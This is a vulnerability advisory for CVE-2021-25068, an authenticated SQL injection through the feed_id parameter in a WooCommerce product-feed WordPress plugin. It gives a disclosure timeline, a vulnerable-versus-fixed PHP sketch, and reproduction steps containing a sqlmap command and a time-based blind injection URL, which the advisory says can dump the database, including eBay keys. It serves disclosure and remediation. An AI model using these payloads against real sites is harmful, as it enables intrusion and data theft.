CVE-2021-25068 - Exportfeed for Woocommerce Google Product Feed <=1.2.4 Authenticated SQL Injection

CVE-2021-25068

CVSS: Pending

https://wordpress.org/plugins/exportfeed-for-woocommerce-google-product-feed/

https://wpscan.com/vulnerability/32799efd-99dc-46dd-8648-e9eb872a0371

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25068

Disclosure Timeline

Dec 13, 2021: Issue identified and disclosed to WPScan (#5634)

Dec 13, 2021: Got auto-reply

Dec 16th, 2021: Got update that the vendor had been contacted; CVE-2021-25068 assigned

February 21, 2022: Plugin closed

March 28, 2022: CVE Published in NVD

Description:

The 'Exportfeed for Woocommerce Google Product Feed' WordPress plugin v1.2.4 uses a 'feed_id' POST parameter which is not properly sanitized before being used in an SQL statement, leading to a SQL injection vulnerability.

The problematic code is in fetch_product_ajax.php.

This vulnerability is present in the current version of the plugin, 1.2.4. Administrative access is required to reach the vulnerable functionality.
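For reference, the following PHP sketch is an added illustration and not the plugin's own code: it shows a feed_id lookup written the way the advisory describes (the request value concatenated straight into the SQL string) beside the hardened form a plugin author would ship. The table name gcpf_feeds, the column name id and the nonce action name gcpf_cart_product are assumed placeholders; the WordPress functions used ($wpdb->prepare, absint, check_ajax_referer, current_user_can, wp_send_json_error) are real core/WooCommerce APIs.

```php
<?php
// Added illustration, not code from the plugin. Table/column names and the
// nonce action are assumptions chosen to match the advisory's request.

// Vulnerable pattern: the raw POST value is interpolated into the query text,
// so a value such as "1 AND (SELECT SLEEP(5))" is executed as SQL.
function gcpf_get_feed_vulnerable( $wpdb ) {
    $feed_id = $_POST['feed_id'];
    $sql = "SELECT * FROM {$wpdb->prefix}gcpf_feeds WHERE id = $feed_id";
    return $wpdb->get_row( $sql );
}

// Hardened form: capability check, nonce check, strict type validation and a
// parameterised query. The integer value never becomes part of the SQL text.
function gcpf_get_feed_hardened( $wpdb ) {
    // Only users allowed to manage the store should reach this AJAX handler.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // The 'security' nonce carried in the request must belong to this action
    // (action name is an assumed placeholder).
    check_ajax_referer( 'gcpf_cart_product', 'security' );

    // feed_id is an integer identifier; reject anything that is not one.
    if ( ! isset( $_POST['feed_id'] ) || ! ctype_digit( (string) $_POST['feed_id'] ) ) {
        wp_send_json_error( 'invalid feed_id', 400 );
    }
    $feed_id = absint( $_POST['feed_id'] );

    // %d is an integer placeholder: $wpdb->prepare() casts the argument and
    // substitutes it safely, so no injected SQL can reach the database.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}gcpf_feeds WHERE id = %d",
        $feed_id
    );
    return $wpdb->get_row( $sql );
}
```

The key change is the last statement: with $wpdb->prepare() and a %d placeholder the user-controlled value is bound as an integer rather than spliced into the query string, which removes the injection regardless of what the request contains. The capability and nonce checks are defence in depth for an admin-only handler and do not replace the parameterised query.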


Steps to reproduce:

1. Log into WordPress as the admin user

2. Install WooCommerce and 'Exportfeed for Woocommerce Google Product Feed' plugins

3. Perform initial config for the WooCommerce plugin and create a product

4. In the ExportFeed plugin settings, go to Create Feed and click Custom Product Feed, search for a product and capture the request with an intercepting proxy.

5. Modify the original request parameters so the request hits the vulnerable functionality

Original request:

Modified request:

&q=showT&feed_id=1

6. Save the request to a file, request.txt

7. Run sqlmap to pull the current user

sqlmap -r request.txt --dbms=mysql --current-user --keep-alive --level=3 --risk=3 -p product_id --threads=5 --flush-session

Or

https://test0.local/wp-admin/admin-ajax.php?security=a5e2dfc8ec&action=gcpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.php&keywords=snake&category=&brand=&sku=&merchat_type=Google&service_name=Google&limit=0,10&q=showT&feed_id=1 AND (SELECT 2347 FROM (SELECT(SLEEP(5)))Otih)

Using this technique, we can also (slowly) dump the entire contents of the database, including the key for the eBay connection this plugin uses, WordPress users, and so on.